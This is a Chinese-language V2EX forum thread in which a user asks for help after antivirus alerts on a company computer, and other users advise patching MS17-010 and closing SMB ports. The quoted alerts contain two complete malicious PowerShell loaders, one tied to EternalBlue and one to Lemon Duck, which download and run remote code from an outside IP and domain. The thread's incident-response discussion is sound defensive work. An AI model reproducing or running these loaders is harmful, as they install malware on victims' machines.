公司电脑,火绒提示被攻击,这是啥情况

2020-02-28 14:24:34 +08:00
 shadowyue

操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

命令行:powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='1cd2db7421c0b88eb89eb6182bd6785e';$ifp=$env:tmp+'\if.bin';$down_url='http://207.154.225.82';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$.ToString('X2')};return $s}if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient)."downloaddata"($down_url+'/if.bin?SZXHRZZLIT036&9CBD7D74-E8C3-6E51-230D-12457CECDB29&DC:4A:3E:76:02:A0');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"

攻击方式:Exploit/EternalBlue

远程地址:10.83.3.33:445

防御结果:已阻止

7132 次点击
所在节点    程序员
37 条回复
BrettD
2020-02-28 14:27:36 +08:00
勒索软件的感觉
shadowyue
2020-02-28 14:29:35 +08:00
http://207.154.225.82
这个地址我还能访问,是个 nginx
crab
2020-02-28 14:29:59 +08:00
局域网没打那补丁?
phpinfos
2020-02-28 14:30:53 +08:00
永恒之蓝 445 端口关掉 打补丁
shadowyue
2020-02-28 14:30:57 +08:00
@crab 啥补丁
shadowyue
2020-02-28 14:33:10 +08:00
@phpinfos 这个东西严重吗,要跟公司 IT 讲吗
phpinfos
2020-02-28 14:35:11 +08:00
@shadowyue
一般会跟勒索病毒绑在一起,小心为好,赶紧修复吧
补丁: https://technet.microsoft.com/zh-cn/library/security/MS17-010
Osk
2020-02-28 14:36:48 +08:00
看这样子怎么像 smb v1 的漏洞补丁没打?
Osk
2020-02-28 14:38:24 +08:00
不需要共享打印机和文件夹的话可以先在防火墙里面把本机的 445 等 smb service 端口关闭了,毕竟看样子你是在毒窝里面了🤣
shadowyue
2020-02-28 14:47:35 +08:00
淦哦,公司 win10 没法更新补丁
shadowyue
2020-02-28 14:51:43 +08:00
@Osk 毒窝吗,公司好多人正上班呢,跟 it 讲了没回我呢,还好火绒帮我挡住了
shadowyue
2020-02-28 14:56:11 +08:00
it 说自己杀毒就行,一直都有这个病毒🤣
Osk
2020-02-28 14:59:04 +08:00
@shadowyue 永恒之蓝在没打补丁或做防护措施的局域网中传播很快的。

win7, win8, win 10 <1703 (好像是这个版本)都会中招。很好奇 win 10 没法更新补丁是什么情况?
win10 打补丁比 win7 方便多了,只需要去下载最近的月度累计更新手动安装也很方便。


作为用户,不想打补丁就先把本机的 445、135、137、138、139 端口关闭了,除非你需要共享打印机或者文件给别人。毕竟万一火绒没拦住就惨了
Osk
2020-02-28 15:00:50 +08:00
另外,看你们内网的 ip 都是 10 的,看起来是大公司了,it 都这么水吗 /doge/
shadowyue
2020-02-28 15:13:27 +08:00
@Osk 公司好像没几个人用 win10,我更新一直都是提示失败了,不知道为啥。

我被攻击了 powershell 这个程序就疯狂跑吃 cpu,好奇别人没这个问题吗,电脑卡爆了应该有别人反馈才对。

公司是蛮大的,工作累了直接睡,没问题 🤣
Osk
2020-02-28 15:15:44 +08:00
公司上外网需要使用代理吗?

吃 cpu 而不搞你的文件的话,看起来像挖矿的程序,危害也。。。不大吧 /滑稽 /
shadowyue
2020-02-28 15:21:34 +08:00
@Osk 不用,但是禁止了一些娱乐网站,我自己挂代理可以浏览,哈哈
按你说的吧 445 端口关闭了,貌似已经没问题了,谢谢你
shadowyue
2020-02-28 15:41:04 +08:00
@Osk 大佬救救我,这又是啥

操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c "$Lemon_Duck='1EdJ95\kmSXYuMOLF1';$x='t.awc'+'na.com';;$y='http://'+$x+'/x.js';$z=$y+'p?ipc_20200228';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"

风险分类:木马盗号

访问网址:t.awcna.com/x.js

操作结果:已阻止
Shazoo
2020-02-28 15:55:40 +08:00
下载 http://t.awcna.com/x.js ,如果程序的 md5=a49add2a8eeb7e89b9d743c0af0e1443,执行之。

https://x.threatbook.cn/nodev4/domain/awcna.com 看看细节呗。
Osk
2020-02-28 15:56:58 +08:00
@shadowyue 看来一开始火绒并没有拦住病毒。。。先把 powershell 进程结束了看是否再生,建议断网杀毒。必要的话重装了。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/648332

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX